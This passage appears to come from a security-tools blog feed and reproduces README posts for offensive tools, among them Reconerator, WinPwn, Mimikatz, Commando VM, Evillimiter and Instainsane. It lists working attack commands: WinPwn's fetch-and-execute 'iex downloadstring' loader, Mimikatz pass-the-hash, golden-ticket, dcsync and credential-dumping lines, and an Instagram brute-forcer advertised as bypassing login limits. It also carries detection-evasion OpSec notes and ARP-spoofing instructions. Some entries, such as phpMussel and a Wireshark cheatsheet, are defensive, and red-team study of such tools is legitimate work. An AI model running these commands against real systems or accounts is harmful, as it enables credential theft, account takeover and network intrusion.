beacon> execute-assembly /tmp/Reconerator.exe resolvehost www.google.com

OpSec
This will generate a DNS query to the domain controller, but it is unlikely that anything will raise this as an alert due to the sheer volume of legitimate DNS requests.

INDEXSEARCH

Overview
This allows you to interact with Windows Search (formerly the Windows Indexing Service) which will allow you to search for interesting files and folders (and their contents) really quickly. E-Mails are usually indexed, but network folders are not, so it may not be perfect for searching users' home directories if they are stored remotely. However, it is very fast.
The interface to Windows Search is SQL-like; this implementation allows you to, in effect, specify the contents of the 'WHERE' clause. It is easiest to explain by example, but you will need to read MSDN if you want to know every possible criteria.

Examples
Find everything that has been indexed which contains the word 'password' in it somewhere (i.e. searches the contents of files and e-mails):
beacon> execute-assembly /tmp/Reconerator.exe indexsearch "CONTAINS('password')"
Find everything that has been indexed which has the word 'stufus' in the path or filename somewhere:
beacon> execute-assembly /tmp/Reconerator.exe indexsearch "System.ItemPathDisplay LIKE '%stufus%'"
Find everything that has been indexed which has the word 'stufus' in the filename OR contains the word 'secret':
beacon> execute-assembly /tmp/Reconerator.exe indexsearch "System.ItemName LIKE '%stufus%' OR CONTAINS('secret')"

OpSec
I'm not aware of anything that would raise this as suspicious.

PROXYCHECK

Overview
This returns the proxy server that would be used to visit a given URL. This is to cope with the situation where there may be different proxies for different URLs, or various complex exclusions in place. The URL of interest is passed as a parameter.
Note that if 'basic all' is specified (see above), it automatically includes a proxycheck to http://www.google.com, on the assumption that most organisations have one outbound proxy for all non-internal internet access.

Examples
Display the proxy server which will be used when visiting www.google.com:
beacon> execute-assembly /tmp/Reconerator.exe proxycheck www.google.com
Display the proxy server which will be used when visiting https://www.mwrinfosecurity.com:
beacon> execute-assembly /tmp/Reconerator.exe proxycheck https://www.mwrinfosecurity.com

OpSec
This is a local activity and a legitimate one; I'm not aware of anything that would raise it as suspicious.

PRIVESCCHECK

Overview
This will explore a number of privilege escalation vectors and report on whether they are possible or not. Currently, that number is 1.
Much like the BASIC module above, privesccheck all can be specified on the command line to attempt all checks, or a specific check can be specified if required.

Parameters
The verb 'basic' needs to be passed on the command line, followed by the specific check that is required. If the word 'all' is passed as the second parameter, every check will be performed.

Check	Description
alwaysinstallelevated	Determine whether the 'AlwaysInstallElevated' key is set to 1 or not. If set, this will run any MSI file as a local administrator.

OpSec

Check	Notes
alwaysinstallelevated	This is a local registry query; it is unlikely that anything will flag this as malicious.

Examples
Attempt all privilege escalation checks:
beacon> execute-assembly /tmp/Reconerator.exe privesccheck all
Check whether the AlwaysInstallElevated registry key is set only:
beacon> execute-assembly /tmp/Reconerator.exe privesccheck alwaysinstallelevated

Compiling
Compile this in Visual Studio 2017. It currently uses .NET v4. You can change that in the compilation preferences if you want to.

Download Reconerator

↧

WinPwn - Automation For Internal Windows Penetrationtest

March 29, 2019, 5:12 am

≫ Next: phpMussel - PHP-based Anti-Virus Anti-Trojan Anti-Malware Solution

≪ Previous: Reconerator - C# Targeted Attack Reconnaissance Tools

In many past internal penetration tests I often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support. For this reason I wrote my own script with automatic proxy recognition and integration. The script is mostly based on well-known large other offensive security Powershell projects. I only load them one after the other into RAM via IEX Downloadstring and partially automate the execution to save time.
Yes it is not a C# and it may be flagged by antivirus solutions. Windows Defender for example blocks some of the known scripts/functions.
Different local recon modules, domain recon modules, pivilege escalation and exploitation modules. Any suggestions, feedback and comments are welcome!
Just Import the Modules with "Import-Module .\WinPwn_v0.7.ps1" or with iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn_v0.7.ps1')

Functions available after Import:

WinPwn -> Guides the user through all functions/Modules with simple questions.
Inveigh -> Executes Inveigh in a new Console window (https://github.com/Kevin-Robertson/Inveigh), SMB-Relay attacks with Session management afterwards
sessionGopher -> Executes Sessiongopher and Asking for parameters (https://github.com/Arvanaghi/SessionGopher)
Mimikatzlocal -> Executes Invoke-WCMDump and Invoke-Mimikatz (https://github.com/PowerShellMafia/PowerSploit)
localreconmodules -> Executes Get-Computerdetails and Just another Windows Privilege escalation script + Winspect (https://github.com/PowerShellMafia/PowerSploit, https://github.com/A-mIn3/WINspect, https://github.com/411Hall/JAWS)
JAWS -> Just another Windows Privilege Escalation script gets executed
domainreconmodules -> Different Powerview situal awareness functions get executed and the output stored on disk. In Addition a Userlist for DomainpasswordSpray gets stored on disk. An AD-Report is generated in CSV Files (or XLS if excel is installed) with ADRecon. (https://github.com/sense-of-security/ADRecon, https://github.com/PowerShellMafia/PowerSploit, https://github.com/dafthack/DomainPasswordSpray)
Privescmodules -> Executes different privesc scripts in memory (Sherlock https://github.com/rasta-mouse/Sherlock, PowerUp, GPP-Files, WCMDump)
lazagnemodule -> Downloads and executes lazagne.exe (if not detected by AV) (https://github.com/AlessandroZ/LaZagne)
latmov -> Searches for Systems with Admin-Access in the domain for lateral movement. Mass-Mimikatz can be used after for the found systems. Domainpassword-Spray for new Credentials can also be used here.
empirelauncher -> Launch powershell empire oneliner on remote Systems (https://github.com/EmpireProject/Empire)
shareenumeration -> Invoke-Filefinder and Invoke-Sharefinder from Powerview (Powersploit)
groupsearch -> Get-DomainGPOUserLocalGroupMapping - find Systems where you have Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit)
Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking
isadmin -> Checks for local admin access on the local system
Sharphound -> Downloads Sharphound and collects Information for the Bloodhound DB
adidnswildcard -> Create a Active Directory-Integrated DNS Wildcard Record and run Inveigh for mass hash gathering. (https://blog.netspi.com/exploiting-adidns/#wildcard)

The "oBEJHzXyARrq.exe"-Executable is an obfuscated Version of jaredhaights PSAttack Tool for Applocker/PS-Restriction Bypass (https://github.com/jaredhaight/PSAttack).
Todo:

Get the scripts from my own creds repository (https://github.com/SecureThisShit/Creds) to be independent from changes in the original repositories.
Proxy Options via PAC-File are not correctly found in the moment.

Legal disclaimer:
Usage of WinPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.

Download WinPwn

↧

phpMussel - PHP-based Anti-Virus Anti-Trojan Anti-Malware Solution

March 29, 2019, 1:12 pm

≫ Next: Just-Metadata - Tool That Gathers And Analyzes Metadata About IP Addresses

≪ Previous: WinPwn - Automation For Internal Windows Penetrationtest

phpMussel is an ideal solution for shared hosting environments, where it's often not possible to utilize or install conventional anti-virus protection solutions, phpMussel is a PHP script designed to detect trojans, viruses, malware and other threats within files uploaded to your system wherever the script is hooked, based on the signatures of ClamAV and others. For information regarding HOW TO INSTALL {2A+2B} and HOW TO USE {3A+3B} phpMussel, please refer either to the Wiki or to the documentation included within the "_docs" directory of this repository (direct links to that documentation included under the "Documentation" header below this paragraph).

Features:

Licensed as GNU General Public License version 2.0 (GPLv2).
Easy to install, easy to customise, easy to use.
Works for any system with PHP+PCRE installed, regardless of OS (PHP+PCRE required).
Fully configurable based on your needs.
Ideal solution for shared hosting services.
Ideal solution for forum systems in need of file upload protection.
Does NOT require shell access.
Does NOT require administrative privileges.
CLI mode available.
Good, strong, stable support base.

Documentation:

Download phpMussel

↧

Just-Metadata - Tool That Gathers And Analyzes Metadata About IP Addresses

March 30, 2019, 5:09 am

≫ Next: FFM (Freedom Fighting Mode) - Open Source Hacking Harness

≪ Previous: phpMussel - PHP-based Anti-Virus Anti-Trojan Anti-Malware Solution

Just-Metadata is a tool that can be used to gather intelligence information passively about a large number of IP addresses, and attempt to extrapolate relationships that might not otherwise be seen. Just-Metadata has "gather" modules which are used to gather metadata about IPs loaded into the framework across multiple resources on the internet. Just-Metadata also has "analysis" modules. These are used to analyze the data loaded Just-Metadata and perform various operations that can identify potential relationships between the loaded systems.

Just-Metadata will allow you to quickly find the Top "X" number of states, cities, timezones, etc. that the loaded IP addresses are located in. It will allow you to search for IP addresses by country. You can search all IPs to find which ones are used in callbacks as identified by VirusTotal. Want to see if any IPs loaded have been documented as taking part of attacks via the Animus Project, Just-Metadata can do it.

Additionally, it is easy to create new analysis modules to let people find other relationships between IPs loaded based on the available data. New intel gathering modules can be easily added in just as easily!

Setup
Ideally, you should be able to run the setup script, and it will install everything you need.
For the Shodan information gathering module, YOU WILL NEED a Shodan API key. This costs like $9 bucks, come on now, it's worth it :).

Usage
As of now, Just metadata is designed to read in a single text file containing IPs, each on their own new line. Create this file from any source (C2 callback IPs, web server logs, etc.). Once you have this file, start Just-Metadata by calling it:
./Just-Metadata.py

Commands
help - Once in the framework, to see a listing of available commands and a description of what they do, type the "help" command.
load <filename> - The load command takes an extra parameter, the file name that you (the user) want Just-Metadata to load IP addresses from. This command will open, and load all IPs within the file to the framework.
Ex: load ipaddresses.txt
save - The save command can be used to save the current working state of Just-Metadata. This is helpful in multiple cases, such as after gathering information about IPs, and wanting to save the state off to disk to be able to work on them at a later point in time. Simply typing "save" will result in Just-Metadata saving the state to disk, and displaying the filename of the saved state.
import <statefile> - The import command can be used to load a previously saved Just-Metadata state into the framework. It will load all IPs that were saved, and all information gathered about the IP addresses. This command will require an extra parameter, the name of the state file that you want Just-Metadata to load.
Ex: import goodfile.state
list <module type> - The list command can be used to list the different types of modules loaded into Just-Metadata. This command will take an extra parameter, either "analysis" or "gather". Just-Metadata will display all mofules of the type that the user requests is listed.
Ex: list analysis
Ex: list gather
gather <gather module name> - The gather command tells Just-Metadata to run the module specified and gather information from that source. This can be used to gather geographical information, Virustotal, whois, and more. It's all based on the module. The data gathered will be stored within the framework in memory and can also be saved to disk with the "save" command.
Ex: gather geoinfo
Ex: gather virustotal
analyze <analysis module name> - The analyze command tells Metadata to run an analysis module against the data loaded into the framework. These modules can be used to find IP addresses that share the same SSH keys or SSL Public Key certificates, or certificate chains. They can also be used to find IP addresses used in the same callbacks by malicious executables.
ip_info <IP Address> - This command is used to dump all information about a specific IP address. This is currently being used after having run analysis modules. For example, after identifying IP addresses that share the same SSH keys, I can dump all information about those IPs. I will see if they have been used by malware, where they are located, etc.
export - The export command will have Just-Metadata dump all information that's been gathered about all IP addresses currently loaded into the framework to CSV.

Thanks
Thanks to Justin Warner (@sixdub) for helping to give me some initial feedback, design ideas, and act as a sounding board during development!

Download Just-Metadata

↧

FFM (Freedom Fighting Mode) - Open Source Hacking Harness

March 30, 2019, 1:30 pm

≫ Next: Wireshark Cheatsheet

≪ Previous: Just-Metadata - Tool That Gathers And Analyzes Metadata About IP Addresses

FFM is a hacking harness that you can use during the post-exploitation phase of a red-teaming engagement. The idea of the tool was derived from a 2007 conference from @thegrugq.

It was presented at SSTIC 2018 and the accompanying slide deck is available at this url. If you're not familiar with this class of tools, it is strongly advised to have a look at them to understand what a hacking harness' purpose is. All the comments are included in the slides.

Usage
The goal of a hacking harness is to act as a helper that automates common tasks during the post-exploitation phase, but also safeguards the user against mistakes they may make.
It is an instrumentation of the shell. Run ./ffm.py to activate it and you can start working immediately. There are two commands you need to know about:

Type !list to display the commands provided by the harness.
Type SHIFT+TAB to perform tab completion on the local machine. This may be useful if you're ssh'd into a remote computer but need to reference a file that's located on your box.

List of features
This hacking harness provides a few features that are described below. As they are described, the design philosophy behind the tool will also be introduced. It is not expected that all the commands implemented in FFM will suit you. Everyone has their own way of doing things, and tuning the harness to your specific need is likely to require you to modify some of the code and/or write a few plugins. A lot of effort went into making sure this is a painless task.

Commands

!os is an extremely simple command that just runs cat /etc/*release* to show what OS the current machine is running. It is probably most valuable as a demonstration that in the context of a hacking harness, you can define aliases that work across machine boundaries. SSH into any computer, type !os and the command will be run. This plugin is located in commands/replacement_commands.py and is a good place to start when you want to learn about writing plugins.
!download [remote file] [local path] gets a file from the remote machine and copies it locally through the terminal. This command is a little more complex because more stringent error checking is required but it's another plugin you can easily read to get started. You can find it in commands/download_file.py. Note that it requires xxd or od on the remote machine to function properly.
!upload [local file] [remote path] works exactly the same as the previous command, except that a local file is put on the remote machine.
!pty spawns a TTY, which is something you don't want in most cases because it tends to leave forensics evidence. However, some commands (sudo) or exploits require a TTY to run in so this is provided as a convenience. UNSET HISTFILE is passed to it as soon as it spawns.
!py [local script] executes a local Python script on the remote machine, and does so entirely in memory. Check out my other repository for scripts you might want to use. This commands uses a multiline syntax with <<, which means that pseudo-shells that don't support it (Weevely is a good example of that) will break this command quite badly.

Plugins can be further configured by editing ffm.conf.

Processors
Conceptually, commands (as described above) are used to generate some bash which is forwarded to the shell. They can perform more complex operations by capturing the shell's output and generating additional instructions based on what is returned. Processors are a little different as they are rather used to rewrite data circulating between the user and the underlying bash process. While it is true that any processor could be rewritten as a command, it seemed a little cleaner to separate the two. Input processors work on whatever is typed by the user once they press the ENTER key, and output processors can modify anything returned by the shell.

A good processor example can be found in processors/ssh_command_line.py. All it does is add the -T option to any SSH command it sees if it is missing. Be sure to check out its simple code if you are interested in writing a processor.
Another input processor present in the framework, processors/assert_torify.py, contains a blacklist of networking commands (ssh, nc) and blocks them if they don't seem to be proxied through a tool such as torify. The harness does its best to only bother the user if it seems like the command is being run on the local machine. Obviously this should not be your only safeguard against leaking your home IP address.
Finally, processors/sample_output_processor.py is a very simple output processor that highlights in red any occurrence of the word "password". As it's quite useless, it's not enabled in the framework but you can still use it as a starting point if you want to do something more sophisticated.

Known issues
CTRL+R is not implemented yet and we all miss it dearly.
There is currently no way to run ELFs in memory on a remote machine. This is high on the ToDo list.
More problematic is the fact that the framework hangs from time to time. In 99% of the cases, this happens when it fails to detect that a command it launched has finished running. Usually, this means that the command prompt of the machine you're logged into could not be recognized as such. In that case, you can try improving the regular expression located at the very beginning of the file ffm.py, or log into that same machine with ssh -T as there won't be any problematic prompt anymore. By default, FFM will give up on trying to read the output of a command after 5 minutes (some plugins may implement different timeouts); so if the framework hangs, you'll need to wait until you see an error message (though if the underlying process is still running, you may still not be able to type in commands).

Closing statement
I think I've covered everything about this tool. Again, it's a little different from what I usually release as most people will probably need to modify it before it can be valuable to them.
Many plugins have yet to be written, so be sure to share back any improvements you make to FFM. Feel free to open issues not only for bugs, but also if you're trying to do something and can't figure out how; this way I'll be able to improve the documentation for everyone.

Download FFM

↧

Wireshark Cheatsheet

March 31, 2019, 5:30 am

≫ Next: IDArling - Collaborative Reverse Engineering Plugin For IDA Pro & Hex-Rays

≪ Previous: FFM (Freedom Fighting Mode) - Open Source Hacking Harness

Wireshark, whose old name is Ethereal; It is a program that can run in many operating systems such as Windows, Linux, MacOS or Solaris and can analyze all the traffic going to network cards connected to computer. Analyze over 750 protocols Can capture packets and save them to a file.

Logical operators are available for all filtering.

Example: http & ip.src == 192.168.0.1
Management Frame: The frame for the connection between the network device and the client.
Control Frame: Controls the integrity of data traffic between the network device and the client.
Data Frame: The frame on which the original data is transferred.

Only to show the outgoing packets from the management frame.

wlan.fc.type==0

To show incoming, outgoing packets through control frame.

wlan.fc.type==1

To show packets transferred over the data frame.

wlan.fc.type==2

Association lists the requests.

wlan.fc.type_subtype==0

Association lists the answers.

wlan.fc.type_subtype==1

Probe lists requests.

wlan.fc.type_subtype==4

Lists the probe responses.

wlan.fc.type_subtype==5

Lists Beacon signals / waves.

wlan.fc.type_subtype==8

Lists the Authentication requests.

wlan.fc.type_subtype==11

Lists deauthentication requests.

wlan.fc.type_subtype==12

TCP lists the outgoing packets to the xx port.

tcp.port == xx

TCP lists packages with the Source xx port.

tcp.srcport == xx

TCP lists packages with a destination xx port.

tcp.dstport == xx

UDP lists the outgoing packets to the xx port.

udp.port == xx

UDP lists packets with a destination xx port.

udp.srcport == xx

UDP lists packages that have the Source xx port.

udp.dstport == xx

Lists the HTTP Get requests.

http.request

Lists packages for the source or destination mac address.

wlan.addr == MAC-Address

The source lists packages that have a mac address.

wlan.sa == MAC-Address

Lists packages that have a target mac address.

wlan.da == MAC-Address

Source Wireshark-Cheatsheet

↧

IDArling - Collaborative Reverse Engineering Plugin For IDA Pro & Hex-Rays

March 31, 2019, 2:18 pm

≫ Next: Commando VM - The First of Its Kind Windows Offensive Distribution

≪ Previous: Wireshark Cheatsheet

IDArling is a collaborative reverse engineering plugin for IDA Pro and Hex-Rays. It allows to synchronize in real-time the changes made to a database by multiple users, by connecting together different instances of IDA Pro.
The main features of IDArling are:

hooking general user events
structure and enumeration support
Hex-Rays decompiler syncing
replay engine and auto-saving
database loading and saving
interactive status bar widget
user cursors (instructions, functions, navbar)
invite and following an user moves
dedicated server using Qt5
integrated server within IDA
LAN servers discovery
following an user moves in real time

If you have any questions not worthy of a bug report, feel free to ping us at #idarling on freenode and ask away.

Releases
This project is under active development. Feel free to send a PR if you would like to help! :-)
It is not really stable in its current state, please stayed tuned for a first release of the project!

Installation
Install the IDArling client into the IDA plugins folder.

Copy idarling_plugin.py and the idarling folder to the IDA plugins folder.
- On Windows, the folder is at C:\Program Files\IDA 7.x\plugins
- On macOS, the folder is at /Applications/IDA\ Pro\ 7.x/idabin/plugins
- On Linux, the folder may be at ~/ida-7.x/plugins/
Alternatively, you can use the "easy install" method by copying the following line into the console:

import urllib2; exec(urllib2.urlopen('https://raw.githubusercontent.com/IDArlingTeam/IDArling/master/easy_install.py')).read()

Warning: The plugin is only compatible with IDA Pro 7.x on Windows, macOS, and Linux.
The dedicated server requires PyQt5, which is integrated into IDA. If you're using an external Python installation, we recommand using Python 3, which offers a pre-built package that can be installed with a simple pip install PyQt5.

Usage
Open the Settings dialog accessible from the right-clicking the widget located in the status bar. Show the servers list by clicking on the Network Settings tabs and add your server to it. Connect to the server by clicking on it after right-clicking the widget again. Finally, you should be able to access the following menus to upload or download a database:

- File --> Open from server
- File --> Save to server

Thanks
This project is inspired by Sol[IDA]rity. It started after contacting its authors and asking if it was ever going to be released to the public. Lighthouse source code was also carefully studied to understand how to write better IDA plugins.

Previous plugins, namely CollabREate, IDASynergy, YaCo, were studied during the development process;
The icons are edited and combined versions from the sites freeiconshop.com and www.iconsplace.com.

Thanks to Quarkslab for allowing this release.

Authors

Alexandre Adamski <neat@idarling.re>
Joffrey Guilbon <patate@idarling.re>

Download IDArling

↧

Commando VM - The First of Its Kind Windows Offensive Distribution

April 1, 2019, 4:45 am

≫ Next: Mimikatz v2.2.0 - A Post-Exploitation Tool to Extract Plaintexts Passwords, Hash, PIN Code from Memory

≪ Previous: IDArling - Collaborative Reverse Engineering Plugin For IDA Pro & Hex-Rays

Welcome to CommandoVM - a fully customized, Windows-based security distribution for penetration testing and red teaming.

Installation (Install Script)

Requirements

Windows 7 Service Pack 1 or Windows 10
60 GB Hard Drive
2 GB RAM

Instructions

Create and configure a new Windows Virtual Machine

Ensure VM is updated completely. You may have to check for updates, reboot, and check again until no more remain
Take a snapshot of your machine!
Download and copy install.ps1 on your newly configured machine.
Open PowerShell as an Administrator
Enable script execution by running the following command:
- Set-ExecutionPolicy Unrestricted
Finally, execute the installer script as follows:
- .\install.ps1
- You can also pass your password as an argument: .\install.ps1 -password <password>

The script will set up the Boxstarter environment and proceed to download and install the Commando VM environment. You will be prompted for the administrator password in order to automate host restarts during installation. If you do not have a password set, hitting enter when prompted will also work.

Installing a new package
Commando VM uses the Chocolatey Windows package manager. It is easy to install a new package. For example, enter the following command as Administrator to deploy Github Desktop on your system:

cinst github

Staying up to date
Type the following command to update all of the packages to the most recent version:

cup all

Installed Tools

Active Directory Tools

Remote Server Administration Tools (RSAT)
SQL Server Command Line Utilities
Sysinternals

Command & Control

Covenant
PoshC2
WMImplant
WMIOps

Developer Tools

Dep
Git
Go
Java
Python 2
Python 3 (default)
Visual Studio 2017 Build Tools (Windows 10)
Visual Studio Code

Evasion

CheckPlease
Demiguise
DotNetToJScript
Invoke-CradleCrafter
Invoke-DOSfuscation
Invoke-Obfuscation
Invoke-Phant0m
Not PowerShell (nps)
PS>Attack
PSAmsi
Pafishmacro
PowerLessShell
PowerShdll
StarFighters

Exploitation

ADAPE-Script
API Monitor
CrackMapExec
CrackMapExecWin
DAMP
Exchange-AD-Privesc
FuzzySec's PowerShell-Suite
FuzzySec's Sharp-Suite
Generate-Macro
GhostPack
- Rubeus
- SafetyKatz
- Seatbelt
- SharpDPAPI
- SharpDump
- SharpRoast
- SharpUp
- SharpWMI
GoFetch
Impacket
Invoke-ACLPwn
Invoke-DCOM
Invoke-PSImage
Invoke-PowerThIEf
Kali Binaries for Windows
LuckyStrike
MetaTwin
Metasploit
Mr. Unikod3r's RedTeamPowershellScripts
NetshHelperBeacon
Nishang
Orca
PSReflect
PowerLurk
PowerPriv
PowerSploit
PowerUpSQL
PrivExchange
Ruler
SharpExchangePriv
SpoolSample
UACME
impacket-examples-windows
vssown

Information Gathering

ADACLScanner
ADExplorer
ADOffline
ADRecon
BloodHound
Get-ReconInfo
GoWitness
Nmap
PowerView
- Dev branch included
SharpHound
SharpView
SpoolerScanner

Networking Tools

Citrix Receiver
OpenVPN
Proxycap
PuTTY
Telnet
VMWare Horizon Client
VMWare vSphere Client
VNC-Viewer
WinSCP
Windump
Wireshark

Password Attacks

ASREPRoast
CredNinja
DSInternals
Get-LAPSPasswords
Hashcat
Internal-Monologue
Inveigh
Invoke-TheHash
KeeFarce
KeeThief
LAPSToolkit
MailSniper
Mimikatz
Mimikittenz
RiskySPN
SessionGopher

Reverse Engineering

DNSpy
Flare-Floss
ILSpy
PEview
Windbg
x64dbg

Utilities

7zip
Adobe Reader
AutoIT
Cmder
CyberChef
Gimp
Greenshot
Hashcheck
Hexchat
HxD
Keepass
MobaXterm
Mozilla Thunderbird
Neo4j Community Edition
Pidgin
Process Hacker 2
SQLite DB Browser
Screentogif
Shellcode Launcher
Sublime Text 3
TortoiseSVN
VLC Media Player
Winrar
yEd Graph Tool

Vulnerability Analysis

Egress-Assess
Grouper2
zBang

Web Applications

Burp Suite
Fiddler
Firefox
OWASP Zap

Wordlists

FuzzDB
PayloadsAllTheThings
SecLists

Download Commando-Vm

↧

Mimikatz v2.2.0 - A Post-Exploitation Tool to Extract Plaintexts Passwords, Hash, PIN Code from Memory

April 1, 2019, 1:37 pm

≫ Next: Osmedeus - Fully Automated Offensive Security Tool For Reconnaissance And Vulnerability Scanning

≪ Previous: Commando VM - The First of Its Kind Windows Offensive Distribution

mimikatz is a tool I've made to learn C and make somes experiments with Windows security.
It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

But that's not all! Crypto, Terminal Server, Events, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes).
If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases

Quick usage

log
privilege::debug

sekurlsa

sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault & lsadump

vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Build
mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:

for mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914)
for mimikatz driver, mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800

mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =)

Synchronize!

GIT URL is : https://github.com/gentilkiwi/mimikatz.git
SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk
ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip

Build the solution

After opening the solution, Build / Build Solution (you can change architecture)
mimikatz is now built and ready to be used! (Win32 / x64)
- you can have error MSB3073 about _build_.cmd and mimidrv, it's because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK.

ddk2003
With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies)
For this optional platform, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.
Follow instructions:

Licence
CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/
mimikatz needs coffee to be developed:

ETH: 0x3a56af999b5e68f9e6e0a7dce1833efefad5b470
BTC: 1C6bubazp9xq3BfYiHvsqP1sEhFYykUDo5
PayPal: https://www.paypal.me/delpy/

Author

Benjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )
DCSync function in lsadump module was co-writed with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )

This is a personal development, please respect its philosophy and don't use it for bad things!

Download Mimikatz

↧

Osmedeus - Fully Automated Offensive Security Tool For Reconnaissance And Vulnerability Scanning

April 2, 2019, 4:55 am

≫ Next: Evillimiter - Limits Bandwidth Of Devices On The Same Network

≪ Previous: Mimikatz v2.2.0 - A Post-Exploitation Tool to Extract Plaintexts Passwords, Hash, PIN Code from Memory

Osmedeus allow you automated run the collection of awesome tools to reconnaissance and vulnerability scanning against the target.

How to use
If you have no idea what are you doing just type the command below or check out the Advance Usage

./osmedeus.py -t example.com

Installation

git clone https://github.com/j3ssie/Osmedeus
cd Osmedeus
./install.sh

This install only focus on Kali linux, check more install on Wiki page

Features

Subdomain Scan.
Subdomain TakeOver Scan.
Screenshot the target.
Basic recon like Whois, Dig info.
IP Discovery.
CORS Scan.
SSL Scan.
Headers Scan.
Port Scan.
Vulnerable Scan.
Seperate workspaces to store all scan output and details logging.
REST API.
SPA Web UI.
Slack notifications.

Demo

Screenshots

Contact
@j3ssiejjj

Download Osmedeus

↧

Evillimiter - Limits Bandwidth Of Devices On The Same Network

April 2, 2019, 1:46 pm

≫ Next: Instainsane - Multi-threaded Instagram Brute Forcer

≪ Previous: Osmedeus - Fully Automated Offensive Security Tool For Reconnaissance And Vulnerability Scanning

A tool to limit the bandwidth (upload/download) of devices connected to your network without physical or administrative access.
evillimiter employs ARP spoofing and traffic shaping to throttle the bandwidth of hosts on the network. This is explained in detail below.

Requirements

Linux distribution
Python 3 or greater

Possibly missing python packages will be installed during the installation process.

Installation

git clone https://github.com/bitbrute/evillimiter.git
cd evillimiter
sudo python3 setup.py install

Alternatively, you can download a desired version from the Release page.

Usage
Type evillimiter or python3 bin/evillimiter to run the tool.
evillimiter will try to resolve required information (network interface, netmask, gateway address, ...) on its own, automatically.

Command-Line Arguments

Argument	Explanation
`-h`	Displays help message listing all command-line arguments
`-i [Interface Name]`	Specifies network interface (resolved if not specified)
`-g [Gateway Address]`	Specifies gateway IP address (resolved if not specified)
`-n [Netmask Address]`	Specifies netmask (resolved if not specified)
`-f`	Flushes current iptables and tc configuration. Ensures that packets are dealt with correctly.
`--colorless`	Disables colored output

evillimiter Commands

Command	Explanation
`scan`	Scans your network for online hosts. One of the first things to do after start.
`hosts`	Displays all the hosts/devices previously scanned and basic information. Shows ID for each host that is required for interaction.
`limit [ID] [Rate]`	Limits bandwidth of host associated to specified ID. Rate determines the internet speed. Valid rates: `bit`, `kbit`, `mbit`, `gbit`, `tbit` For example: `limit 4 200kbit` or `limit 2 1gbit`
`block [ID]`	Blocks internet connection of host associated to specified ID.
`free [ID]`	Unlimits/Unblocks host associated to specified ID. Removes all further restrictions.
`clear`	Clears the terminal window.
`?`, `help`	Displays command information similar to this one.

Restrictions

Limits IPv4 connctions only, since ARP spoofing requires the ARP packet that is only present on IPv4 networks.

Disclaimer
Evil Limiter is provided by bitbrute "as is" and "with all faults". The provider makes no representations or warranties of any kind concerning the safety, suitability, lack of viruses, inaccuracies, typographical errors, or other harmful components of this software. There are inherent dangers in the use of any software, and you are solely responsible for determining whether Evil Limiter is compatible with your equipment and other software installed on your equipment. You are also solely responsible for the protection of your equipment and backup of your data, and the provider will not be liable for any damages you may suffer in connection with using, modifying, or distributing t his software.

Download Evillimiter

↧

Instainsane - Multi-threaded Instagram Brute Forcer

April 3, 2019, 4:43 am

≫ Next: ISeeYou - Bash And Javascript Tool To Find The Exact Location Of The Users During Social Engineering Or Phishing Engagements

≪ Previous: Evillimiter - Limits Bandwidth Of Devices On The Same Network

Instainsane is a Shell Script to perform multi-threaded brute force attack against Instagram, this script can bypass login limiting and it can test infinite number of passwords with a rate of about 1000 passwords/min with 100 attemps at once.

Legal disclaimer:
Usage of InstaInsane for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Features

Multi-thread (100 attempts at once)
Save/Resume sessions
Anonymous attack through TOR
Check valid usernames
Default password list (best +39k 8 letters)
Check and Install all dependencies

Usage:

git clone https://github.com/thelinuxchoice/instainsane
cd instainsane
chmod +x instainsane.sh
sudo ./instainsane.sh

Install requirements (Curl, Tor, Openssl):

chmod +x install.sh
sudo ./install.sh

How it works?
Script uses an Android ApkSignature to perform authentication in addition using TOR instances to avoid blocking. The script uses Instagram-py algorithm (Python), see the project at: https://github.com/antony-jr/instagram-py Thanks to: @antony-jy https://github.com/antony-jr

Download Instainsane

↧